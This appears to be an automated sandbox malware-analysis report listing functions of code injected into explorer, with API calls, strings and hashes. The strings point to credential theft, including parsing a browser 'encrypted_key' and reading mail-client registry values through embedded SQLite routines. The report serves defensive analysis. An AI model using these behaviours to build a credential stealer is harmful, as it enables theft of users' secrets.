                                                                                                        control_flow_graph 667 30fb1e5-30fb20b 668 30fb20d-30fb218 call 30faeea 667->668 669 30fb221-30fb22a 667->669 679 30fb21e 668->679 680 30fb3ea-30fb3f0 668->680 671 30fb22c-30fb237 call 30fae65 669->671 672 30fb240-30fb243 669->672 685 30fb23d 671->685 686 30fb3b4-30fb3b7 671->686 673 30fb3b9-30fb3d3 672->673 674 30fb249-30fb26b call 30fa7ae 672->674 678 30fb3db-30fb3df 673->678 687 30fb26d-30fb278 674->687 688 30fb296-30fb29f 674->688 683 30fb3e8 678->683 684 30fb3e1-30fb3e3 678->684 679->669 683->680 684->683 690 30fb3e5-30fb3e7 684->690 685->672 686->673 689 30fb3d5-30fb3d8 686->689 691 30fb27d-30fb291 call 30fa1c6 687->691 692 30fb2d6-30fb2ea call 30f6a5a 688->692 693 30fb2a1 688->693 689->678 690->683 691->686 700 30fb2ec-30fb2f1 692->700 701 30fb2f6-30fb2fd 692->701 695 30fb2a9-30fb2ad 693->695 696 30fb2a3-30fb2a7 693->696 695->686 699 30fb2b3-30fb2b9 call 30fa67c 695->699 696->692 696->695 704 30fb2be-30fb2c2 699->704 700->686 705 30fb2ff-30fb30e 701->705 706 30fb373 701->706 704->692 708 30fb2c4-30fb2d4 704->708 709 30fb377-30fb37a 705->709 706->709 708->691 710 30fb37c 709->710 711 30fb310-30fb329 CreateFileMappingW 709->711 710->686 712 30fb37e-30fb3ab call 30fa1c6 711->712 713 30fb32b-30fb357 MapViewOfFile 711->713 712->686 718 30fb3ad 712->718 713->712 714 30fb359-30fb370 713->714 714->706 718->686
                                                                                                        APIs
                                                                                                        • CreateFileMappingW.KERNELBASE(?,00000000,00000004,00000000,00000006,00000000,?,?,00000000), ref: 030FB31D
                                                                                                        • MapViewOfFile.KERNELBASE(?,?,00000000,?,?), ref: 030FB34F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$CreateMappingView
                                                                                                        • String ID: winShmMap1$winShmMap2$winShmMap3
                                                                                                        • API String ID: 3452162329-3826999013
                                                                                                        • Opcode ID: 5d9a49e313ad4357391dc8a7206df97e0803e7b4dfd18dfafe872ae11e8416e0
                                                                                                        • Instruction ID: 9a2e59d0868ad2db7beb8ca8d85ff6f6bcb3305837d1679614c2a213a3ba46d8
                                                                                                        • Opcode Fuzzy Hash: 5d9a49e313ad4357391dc8a7206df97e0803e7b4dfd18dfafe872ae11e8416e0
                                                                                                        • Instruction Fuzzy Hash: DD51D175605701DFDB65DF18C840A6BB7E6FF88314F15882EEA868BA50DBB0E805CF91
                                                                                                        Function 030FA40E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 116fileCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 719 30fa40e-30fa424 720 30fa426-30fa42a 719->720 721 30fa4a2-30fa4aa 719->721 723 30fa42c-30fa42f 720->723 724 30fa431-30fa441 720->724 722 30fa4ae-30fa4c8 721->722 725 30fa4cc-30fa4e3 ReadFile 722->725 723->721 723->724 726 30fa469-30fa4a0 memcpy 724->726 727 30fa443 724->727 728 30fa4e5-30fa4ee 725->728 729 30fa524-30fa538 call 30fa2aa 725->729 726->722 730 30fa44a-30fa45a memcpy 727->730 731 30fa445-30fa448 727->731 728->729 737 30fa4f0-30fa4ff call 30fa250 728->737 733 30fa45d 729->733 738 30fa53e-30fa553 memset 729->738 730->733 731->726 731->730 736 30fa45f-30fa466 733->736 737->725 741 30fa501-30fa51f call 30fa1c6 737->741 738->736 741->736
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy$FileReadmemset
                                                                                                        • String ID: winRead
                                                                                                        • API String ID: 2051157613-2759563040
                                                                                                        • Opcode ID: 74aaa9296d9bef9660fe2cee1c85534f71d5dc46aa1a11b729d9f4fb1c445b8f
                                                                                                        • Instruction ID: d49c1d0db5a03bcb7c8df1efbd533973412858902a2a8f9f79a131fc9c101f3e
                                                                                                        • Opcode Fuzzy Hash: 74aaa9296d9bef9660fe2cee1c85534f71d5dc46aa1a11b729d9f4fb1c445b8f
                                                                                                        • Instruction Fuzzy Hash: 99317F75706340AFC750DE18CC8499FB7EAEFC8310F885928FA998BA50D730ED058B52
                                                                                                        Function 030F2E30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 113registryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • StrStrIW.KERNELBASE(?,?), ref: 030F2E4B
                                                                                                        • RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 030F2EE4
                                                                                                        • RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 030F2F54
                                                                                                        • RegCloseKey.KERNELBASE(?), ref: 030F2F62
                                                                                                          • Part of subcall function 030F19E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,030F1AE2,PortNumber,00000000,00000000), ref: 030F1A1E
                                                                                                          • Part of subcall function 030F19E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 030F1A3C
                                                                                                          • Part of subcall function 030F19E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 030F1A75
                                                                                                          • Part of subcall function 030F19E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,030F1AE2,PortNumber,00000000,00000000), ref: 030F1A98
                                                                                                          • Part of subcall function 030F1BC5: lstrlenW.KERNEL32(00000000,00000000,?,030F2E75,PathToExe,00000000,00000000), ref: 030F1BCC
                                                                                                          • Part of subcall function 030F1BC5: StrStrIW.SHLWAPI(00000000,.exe,?,030F2E75,PathToExe,00000000,00000000), ref: 030F1BF0
                                                                                                          • Part of subcall function 030F1BC5: StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,030F2E75,PathToExe,00000000,00000000), ref: 030F1C05
                                                                                                          • Part of subcall function 030F1BC5: lstrlenW.KERNEL32(00000000,?,030F2E75,PathToExe,00000000,00000000), ref: 030F1C1C
                                                                                                          • Part of subcall function 030F1AFE: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,030F2E83,PathToExe,00000000,00000000), ref: 030F1B16
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseOpenQueryValuelstrlen$EnumFolderPath
                                                                                                        • String ID: PathToExe
                                                                                                        • API String ID: 1799103994-1982016430
                                                                                                        • Opcode ID: a0cf236a97787ea5c7e4ccbbf824e68425bb39e9b0ffb1cdbc9d25cedf0e2638
                                                                                                        • Instruction ID: a5ef9be3c427bc9217ceb47c13bd356d40b745efd05663f4ad31448239f51e58
                                                                                                        • Opcode Fuzzy Hash: a0cf236a97787ea5c7e4ccbbf824e68425bb39e9b0ffb1cdbc9d25cedf0e2638
                                                                                                        • Instruction Fuzzy Hash: B231A079606311AF8719EF22C804DAFBAE9EFC9250B04491CF9599B644DB34C906CBE1
                                                                                                        Function 030FA67C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 78fileCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 782 30fa67c-30fa692 783 30fa694-30fa6bf _alldiv _allmul 782->783 784 30fa6c1-30fa6c4 782->784 785 30fa6c7-30fa6d2 call 30fa33b 783->785 784->785 788 30fa6d4-30fa6df 785->788 789 30fa6f0-30fa6fb SetEndOfFile 785->789 790 30fa6e4-30fa6ee call 30fa1c6 788->790 791 30fa71e 789->791 792 30fa6fd-30fa708 789->792 794 30fa722-30fa726 790->794 791->794 792->791 799 30fa70a-30fa71c 792->799 797 30fa73a-30fa740 794->797 798 30fa728-30fa72b 794->798 798->797 800 30fa72d 798->800 799->790 801 30fa72f-30fa732 800->801 802 30fa734-30fa737 800->802 801->797 801->802 802->797
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File_alldiv_allmul
                                                                                                        • String ID: winTruncate1$winTruncate2
                                                                                                        • API String ID: 3568847005-470713972
                                                                                                        • Opcode ID: 9f64b87702b53571c5ac95373f1313de8b7de0b7a5df19fa5ea0566726ecb4ce
                                                                                                        • Instruction ID: e2500d6f2d4c127f8f88fc14c679a96f1d22df1520eac375fb5de7ff07829d66
                                                                                                        • Opcode Fuzzy Hash: 9f64b87702b53571c5ac95373f1313de8b7de0b7a5df19fa5ea0566726ecb4ce
                                                                                                        • Instruction Fuzzy Hash: DD216D76302300AFDF54DE29CC84EAB77A9EF88311B158569EE28DB685D735D810CBA1
                                                                                                        Function 030F4A71 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 030F1000: GetProcessHeap.KERNEL32(00000008,?,030F11C7,?,?,00000001,00000000,?), ref: 030F1003
                                                                                                          • Part of subcall function 030F1000: RtlAllocateHeap.NTDLL(00000000), ref: 030F100A
                                                                                                        • wsprintfW.USER32 ref: 030F4AA2
                                                                                                        • RegCreateKeyExW.KERNELBASE(80000001,00000000,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 030F4AC7
                                                                                                        • RegCloseKey.KERNELBASE(?), ref: 030F4AD4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Heap$AllocateCloseCreateProcesswsprintf
                                                                                                        • String ID: %s\%08x$Software
                                                                                                        • API String ID: 1800864259-1658101971
                                                                                                        • Opcode ID: d7a3ed9f40f7c41930e51c1cb7472be0792dc9109f1257cb5ca89a07beed3a25
                                                                                                        • Instruction ID: 1cdc2d72eb666babc8ed3c29c31776733e09c23dbd0bcc73650de4dca7436aa2
                                                                                                        • Opcode Fuzzy Hash: d7a3ed9f40f7c41930e51c1cb7472be0792dc9109f1257cb5ca89a07beed3a25
                                                                                                        • Instruction Fuzzy Hash: 3C01D475601208BFDB18DB55DC4ADBF77ADEB49658B40016EFA05A3101D7B15D409670
                                                                                                        Function 030F4317 Relevance: 7.6, APIs: 5, Instructions: 64registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _alloca_probe.NTDLL ref: 030F431C
                                                                                                        • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 030F4335
                                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 030F4363
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 030F43C8
                                                                                                          • Part of subcall function 030F1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,030F2F0C), ref: 030F1973
                                                                                                          • Part of subcall function 030F1953: lstrlenW.KERNEL32(03146564,?,?,030F2F0C), ref: 030F1978
                                                                                                          • Part of subcall function 030F1953: lstrcatW.KERNEL32(00000000,?,?,?,030F2F0C), ref: 030F1990
                                                                                                          • Part of subcall function 030F1953: lstrcatW.KERNEL32(00000000,03146564,?,?,030F2F0C), ref: 030F1994
                                                                                                          • Part of subcall function 030F418A: wsprintfW.USER32 ref: 030F4212
                                                                                                          • Part of subcall function 030F1011: GetProcessHeap.KERNEL32(00000000,00000000,?,030F1A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,030F1AE2), ref: 030F1020
                                                                                                          • Part of subcall function 030F1011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,030F1AE2,PortNumber,00000000,00000000), ref: 030F1027
                                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 030F43B9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: EnumHeaplstrcatlstrlen$CloseFreeOpenProcess_alloca_probewsprintf
                                                                                                        • String ID:
                                                                                                        • API String ID: 801677237-0
                                                                                                        • Opcode ID: 3ad4647d9620ffcc9cc969b831cb64ee1c0310214438b4e361dae9b02efc121a
                                                                                                        • Instruction ID: 75332f0c0a827f8a5bdd52b34be6ddfccce6168d74e8ceb4754d8b19ac9a373c
                                                                                                        • Opcode Fuzzy Hash: 3ad4647d9620ffcc9cc969b831cb64ee1c0310214438b4e361dae9b02efc121a
                                                                                                        • Instruction Fuzzy Hash: E91130B5108305BFE719EB11DC44DBB77EDEB88348F00462DB989D6150EB749D489A72
                                                                                                        Function 030FB87B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 202fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.NTDLL ref: 030FB8D5
                                                                                                        • CreateFileW.KERNELBASE(00000000,?,00000003,00000000,-00000003,?,00000000), ref: 030FB96F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateFilememset
                                                                                                        • String ID: psow$winOpen
                                                                                                        • API String ID: 2416746761-4101858489
                                                                                                        • Opcode ID: 939b37d3c2e05a0f662c47917759a2bb1442501ed4202e3912c0bf0d137052c0
                                                                                                        • Instruction ID: 821935a1cba5ca134ebefc3883ff0473d6d7108d8adead10bb61aa2164a57269
                                                                                                        • Opcode Fuzzy Hash: 939b37d3c2e05a0f662c47917759a2bb1442501ed4202e3912c0bf0d137052c0
                                                                                                        • Instruction Fuzzy Hash: 12719F71A0A706AFC750DF28C88075ABBE4FF88724F044A2DFA649B680D775D954CF92
                                                                                                        Function 03159247 Relevance: 6.3, APIs: 4, Instructions: 343COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.0000000003157000.00000040.80000000.00040000.00000000.sdmp, Offset: 03157000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_3157000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0a7ace883b1ee7f75617c8ccaa082c5bd808de063bf2191c76e602b520c42f1f
                                                                                                        • Instruction ID: 69a360c98480e74d5631bb8efc402d29ee9dd0487abfa1ddb5e7dcfd3937caa5
                                                                                                        • Opcode Fuzzy Hash: 0a7ace883b1ee7f75617c8ccaa082c5bd808de063bf2191c76e602b520c42f1f
                                                                                                        • Instruction Fuzzy Hash: C7A15C72914352DFD721CF78CDC06A0BBA5EB0A225B1C06ADEDF18B2C2E7605806C752
                                                                                                        Function 030F19E5 Relevance: 6.1, APIs: 4, Instructions: 89registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,030F1AE2,PortNumber,00000000,00000000), ref: 030F1A1E
                                                                                                        • RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 030F1A3C
                                                                                                        • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 030F1A75
                                                                                                        • RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,030F1AE2,PortNumber,00000000,00000000), ref: 030F1A98
                                                                                                          • Part of subcall function 030F1011: GetProcessHeap.KERNEL32(00000000,00000000,?,030F1A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,030F1AE2), ref: 030F1020
                                                                                                          • Part of subcall function 030F1011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,030F1AE2,PortNumber,00000000,00000000), ref: 030F1027
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HeapQueryValue$CloseFreeOpenProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 217796345-0
                                                                                                        • Opcode ID: f63c1d6e70016b756ec0cf4aa5790cacd585fc86c74db15cad5f2a3aae498f05
                                                                                                        • Instruction ID: 926e4de4c4c5f0d731e0d9a1d6a2e96a413c850fab2fb49c1bd8cd53b2da7dc9
                                                                                                        • Opcode Fuzzy Hash: f63c1d6e70016b756ec0cf4aa5790cacd585fc86c74db15cad5f2a3aae498f05
                                                                                                        • Instruction Fuzzy Hash: 3321917620A341EFE72CCA21DD04F7BB7EDEBC9758F080A2DFA8592540E725C940C661
                                                                                                        Function 030F1EC1 Relevance: 6.1, APIs: 4, Instructions: 82registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RegOpenKeyW.ADVAPI32(?,?,?), ref: 030F1ED5
                                                                                                          • Part of subcall function 030F1000: GetProcessHeap.KERNEL32(00000008,?,030F11C7,?,?,00000001,00000000,?), ref: 030F1003
                                                                                                          • Part of subcall function 030F1000: RtlAllocateHeap.NTDLL(00000000), ref: 030F100A
                                                                                                        • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 030F1F0C
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 030F1F98
                                                                                                          • Part of subcall function 030F1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,030F2F0C), ref: 030F1973
                                                                                                          • Part of subcall function 030F1953: lstrlenW.KERNEL32(03146564,?,?,030F2F0C), ref: 030F1978
                                                                                                          • Part of subcall function 030F1953: lstrcatW.KERNEL32(00000000,?,?,?,030F2F0C), ref: 030F1990
                                                                                                          • Part of subcall function 030F1953: lstrcatW.KERNEL32(00000000,03146564,?,?,030F2F0C), ref: 030F1994
                                                                                                        • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 030F1F82
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: EnumHeaplstrcatlstrlen$AllocateCloseOpenProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 1077800024-0
                                                                                                        • Opcode ID: be2cda677ce33cb7df3486072b11a9cfb5230879fa4f9d33bbc1ae1343612a76
                                                                                                        • Instruction ID: 0ca9451d42ef6558cddc04ebebb3934d75dbb0a6a3ffc562650414f4890d2ba6
                                                                                                        • Opcode Fuzzy Hash: be2cda677ce33cb7df3486072b11a9cfb5230879fa4f9d33bbc1ae1343612a76
                                                                                                        • Instruction Fuzzy Hash: C5218CB5208301BFD709AB21DC48E6BBBEDEFC9248F00892DF59992110DB75C9099B62
                                                                                                        Function 030F1C31 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,030F3E1E,00000000,?,030F3FA8), ref: 030F1C46
                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,00000000,?,030F3FA8), ref: 030F1C56
                                                                                                        • CloseHandle.KERNEL32(00000000,?,030F3FA8), ref: 030F1C91
                                                                                                          • Part of subcall function 030F1000: GetProcessHeap.KERNEL32(00000008,?,030F11C7,?,?,00000001,00000000,?), ref: 030F1003
                                                                                                          • Part of subcall function 030F1000: RtlAllocateHeap.NTDLL(00000000), ref: 030F100A
                                                                                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,030F3FA8), ref: 030F1C76
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
                                                                                                        • String ID:
                                                                                                        • API String ID: 2517252058-0
                                                                                                        • Opcode ID: 2f0ea687330a9859a67345a59fe57f285fdb1022398b723746ac3c167913d3fa
                                                                                                        • Instruction ID: 6d2d39b1b2922da810cd1219a07a410597fec62cfcf9f1104a3749ffac4b0572
                                                                                                        • Opcode Fuzzy Hash: 2f0ea687330a9859a67345a59fe57f285fdb1022398b723746ac3c167913d3fa
                                                                                                        • Instruction Fuzzy Hash: 61F0A431201218BFD328AA26DC88E7B7A9CDB8B7F9B160719F61593180DB53584541B1
                                                                                                        Function 030F2FB1 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 31stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,030F3E30,00000000,00000000,?,030F3FA8), ref: 030F2FC1
                                                                                                        • lstrlen.KERNEL32("encrypted_key":",?,030F3FA8), ref: 030F2FCE
                                                                                                        • StrStrIA.SHLWAPI("encrypted_key":",0314692C,?,030F3FA8), ref: 030F2FDD
                                                                                                          • Part of subcall function 030F190B: lstrlen.KERNEL32(?,?,?,?,00000000,030F2783), ref: 030F192B
                                                                                                          • Part of subcall function 030F190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,030F2783), ref: 030F1930
                                                                                                          • Part of subcall function 030F190B: lstrcat.KERNEL32(00000000,?), ref: 030F1946
                                                                                                          • Part of subcall function 030F190B: lstrcat.KERNEL32(00000000,00000000), ref: 030F194A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: lstrlen$lstrcat
                                                                                                        • String ID: "encrypted_key":"
                                                                                                        • API String ID: 493641738-877455259
                                                                                                        • Opcode ID: b9535b1f90f9dddd02e363a8de2548922e7c0b9eaeca70d5d6beeb2018999b56
                                                                                                        • Instruction ID: 97f3b176cc7b35a9c96b67bb910f82212a7ad3b214c571f9f181c6b70115dd72
                                                                                                        • Opcode Fuzzy Hash: b9535b1f90f9dddd02e363a8de2548922e7c0b9eaeca70d5d6beeb2018999b56
                                                                                                        • Instruction Fuzzy Hash: E2E0222A70BB245F83A9FBB51C4488BBE8C9F4F8193080078E30297102DF928445C2B0
                                                                                                        Function 030FBAFC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,?,readonly_shm,00000000,00000000,?,?,?), ref: 030FBB40
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AttributesFile
                                                                                                        • String ID: winDelete
                                                                                                        • API String ID: 3188754299-3936022152
                                                                                                        • Opcode ID: 862f4603546df5e8fc508c22e54634385feca7477ae91e396b2dc39aba4540f3
                                                                                                        • Instruction ID: a2812ad57d8ff63f631b7e310e47b6ac900b5b786fea864012ea246f68103590
                                                                                                        • Opcode Fuzzy Hash: 862f4603546df5e8fc508c22e54634385feca7477ae91e396b2dc39aba4540f3
                                                                                                        • Instruction Fuzzy Hash: 04110835B02308EFDB11FB68C8409BD77B9DBC5761F144665EA06D7A88DB70C9028F51
                                                                                                        Function 030F2EA5 Relevance: 4.5, APIs: 3, Instructions: 43registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 030F1011: GetProcessHeap.KERNEL32(00000000,00000000,?,030F1A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,030F1AE2), ref: 030F1020
                                                                                                          • Part of subcall function 030F1011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,030F1AE2,PortNumber,00000000,00000000), ref: 030F1027
                                                                                                          • Part of subcall function 030F1000: GetProcessHeap.KERNEL32(00000008,?,030F11C7,?,?,00000001,00000000,?), ref: 030F1003
                                                                                                          • Part of subcall function 030F1000: RtlAllocateHeap.NTDLL(00000000), ref: 030F100A
                                                                                                        • RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 030F2EE4
                                                                                                        • RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 030F2F54
                                                                                                        • RegCloseKey.KERNELBASE(?), ref: 030F2F62
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Heap$Process$AllocateCloseEnumFreeOpen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1066184869-0
                                                                                                        • Opcode ID: 4f2123147260d238a0806588f96fa5f7390f648baa3c88cf2a23d162fcfa8888
                                                                                                        • Instruction ID: ebbafb748c341a866134e8fdca0faaee01bc0e4525e49796f5002313e918dd5c
                                                                                                        • Opcode Fuzzy Hash: 4f2123147260d238a0806588f96fa5f7390f648baa3c88cf2a23d162fcfa8888
                                                                                                        • Instruction Fuzzy Hash: 7101DF39206310AF8718EB22DC049AFBBADEFC9340B00042DFA0996144CB758845DBA1
                                                                                                        Function 030F4B72 Relevance: 4.5, APIs: 3, Instructions: 8COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExitInitializeProcessUninitialize
                                                                                                        • String ID:
                                                                                                        • API String ID: 4175140541-0
                                                                                                        • Opcode ID: 991ff8dcda80e973b724f7e571ccc82daf3ce4986d9c29627b4323828bbd63b9
                                                                                                        • Instruction ID: 28c08399af6ff94ab45100a7deb07d9673dba08a1f52f9261e99ddb3dc097c5c
                                                                                                        • Opcode Fuzzy Hash: 991ff8dcda80e973b724f7e571ccc82daf3ce4986d9c29627b4323828bbd63b9
                                                                                                        • Instruction Fuzzy Hash: CCC09B3C3453015FE6C47BF15C0DB0A355CAF4DB1BF045100F705C9485DB544085C632
                                                                                                        Function 030F9FC8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • HeapCreate.KERNELBASE(00000000,00BD0000,00000000), ref: 030F9FF8
                                                                                                        Strings
                                                                                                        • failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu, xrefs: 030FA00E
                                                                                                        Memory Dump Source
